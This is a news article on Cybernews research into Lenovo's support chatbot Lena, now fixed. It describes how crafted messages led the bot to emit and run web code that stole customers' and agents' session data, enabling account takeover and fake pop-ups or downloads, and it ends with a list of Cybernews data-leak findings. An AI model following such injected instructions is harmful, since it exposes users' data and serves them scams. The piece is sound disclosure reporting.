The Invisible Risks of AI Help: What Lenovo’s Chatbot Flaw Means for Everyday Users
- Finopotamus Staff
- Sep 2, 2025
- 5 min read
Experts warn AI chatbots are becoming the new email inboxes – easy targets for hackers packed with personal data.
When users click “chat with us” on Lenovo’s website, they expect a quick and safe way to get help. But recent research from Cybernews shows that chatting with Lenovo’s AI assistant, Lena, could have put your private information at risk – exposing past support conversations, and even allowing scammers to trick users with fake pop-ups and phishing schemes.
Simply asking a question could have been enough for attackers to hijack user accounts or steal sensitive data, turning a helpful chatbot into a hidden threat Aras Nazarovas, a cybersecurity researcher at Cybernews, captures the urgency: “AI chatbots in a sense, have become the new email inboxes – easy targets full of personal data. Until security practices catch up with innovation, consumers must carry the burden of cautious trust.”
Chatting with Customer Service Isn’t Always Private
Researchers found that Lenovo’s chatbot, Lena, could be fooled by attackers into sharing private information – like the details of your support chats and login sessions. Simply by sending the right kind of message, hackers could trick the bot into handing over data that’s meant to be private.
Worse still, this flaw could let attackers pretend to be Lenovo support agents or push fake warnings and downloads to customers, putting personal information and devices at risk.
Lenovo responded quickly after being alerted and has already fixed the problem, so customers are protected going forward. But the incident shows just how risky AI chatbots can be when security doesn’t keep pace with new technology.
“AI chatbots don’t know what’s safe or dangerous – they follow instructions exactly. Without proper security safeguards, even small mistakes can let hackers sneak in and access your personal information. And this might be the case for many AI chatbots delivering customer service,” warned Nazarovas.
The main problem was that Lena could be tricked into running hidden code inside certain messages. In one test, researchers fooled the chatbot into executing web code that could grab private information (like login details) from both customers and support agents.
That information could then be used by hackers to take over active accounts and read past conversations that include things like purchase details or personal information. In short, what users thought was a safe chat with Lenovo could actually let attackers get their hands on their data.
“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers. LLMs don’t have an instinct for “safe” – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents,” said Žilvinas Girėnas, Head of Product at nexos.ai.
How Chatting with AI Chatbots Could Lead to Scams
The danger doesn’t stop at lost privacy. Attackers can use it as a staging ground for more manipulative schemes. Pop-up windows that mimic trusted log‑in screens, fake CAPTCHA checks that harvest credentials, even phony requests to “download the latest Lenovo update” could be embedded in the support flow. For an unsuspecting consumer, the line between legitimate help and fraud becomes impossible to see.
“What makes this case particularly worrying is not simply that Lenovo fell short on basic web security practices, but that the shortfall occurred in a tool designed specifically to interface with end users,” said Nazarovas. “The chatbot wasn’t a quiet back‑office experiment. It sat on the front page of Lenovo’s consumer portal, the very place customers go to seek trustworthy assistance. That blurs the boundary between corporate security flaws and direct consumer harm.”
It could be filed under “AI growing pains,” an inevitable mishap in the rush to fold large language models into every corner of business. But as researchers point out, the lesson isn’t an abstract one: input and output from AI systems should be treated as inherently unsafe.
“Just like people have learned to be careful with suspicious emails and public Wi-Fi, companies need to make sure their AI chatbots are safe to use. If they don’t, it’s easier for hackers to sneak into the very places customers trust most when they’re asking for help,” added Nazarovas. “For consumers, this means staying cautious when interacting with chatbots like Lena: don’t click on unexpected links or pop-ups in chat windows, never share personal or payment information through a chatbot, and if something feels off, reach out to the company through official websites or phone numbers to verify before trusting chatbot responses.”
ABOUT CYBERNEWS
Cybernews is a globally recognized independent media outlet where journalists and security experts debunk cyber by research, testing, and data. Founded in 2019 in response to rising concerns about online security, the site covers breaking news, conducts original investigations, and offers unique perspectives on the evolving digital security landscape. Through white-hat investigative techniques, Cybernews research team identifies and safely discloses cybersecurity threats and vulnerabilities, while the editorial team provides cybersecurity-related news, analysis, and opinions by industry insiders with complete independence.
Cybernews has earned worldwide attention for its high-impact research and discoveries, which have uncovered some of the internet’s most significant security exposures and data leaks. Notable ones include:
Cybernews researchers discovered multiple open datasets comprising 16 billion login credentials from infostealer malware, social media, developer portals, and corporate networks – highlighting the unprecedented risks of account takeovers, phishing, and business email compromise.
Cybernews researchers analyzed 156,080 randomly selected iOS apps – around 8% of the apps present on the App Store – and uncovered a massive oversight: 71% of them expose sensitive data.
Recently, Bob Dyachenko, a cybersecurity researcher and owner of SecurityDiscovery.com, and the Cybernews security research team discovered an unprotected Elasticsearch index, which contained a wide range of sensitive personal details related to the entire population of Georgia.
The team analyzed the new Pixel 9 Pro XL smartphone’s web traffic, and found that Google's latest flagship smartphone frequently transmits private user data to the tech giant before any app is installed.
The team revealed that a massive data leak at MC2 Data, a background check firm, affects one-third of the US population.
The Cybernews security research team discovered that 50 most popular Android apps require 11 dangerous permissions on average.
They revealed that two online PDF makers leaked tens of thousands of user documents, including passports, driving licenses, certificates, and other personal information uploaded by users.
An analysis by Cybernews research discovered over a million publicly exposed secrets from over 58 thousand websites’ exposed environment (.env) files.
The team revealed that Australia’s football governing body, Football Australia, has leaked secret keys potentially opening access to 127 buckets of data, including ticket buyers’ personal data and players’ contracts and documents.
The Cybernews research team, in collaboration with cybersecurity researcher Bob Dyachenko, discovered a massive data leak containing information from numerous past breaches, comprising 12 terabytes of data and spanning over 26 billion records.
The team analyzed NASA’s website, and discovered an open redirect vulnerability plaguing NASA’s Astrobiology website.
The team investigated 30,000 Android Apps, and discovered that over half of them are leaking secrets that could have huge repercussions for both app developers and their customers.


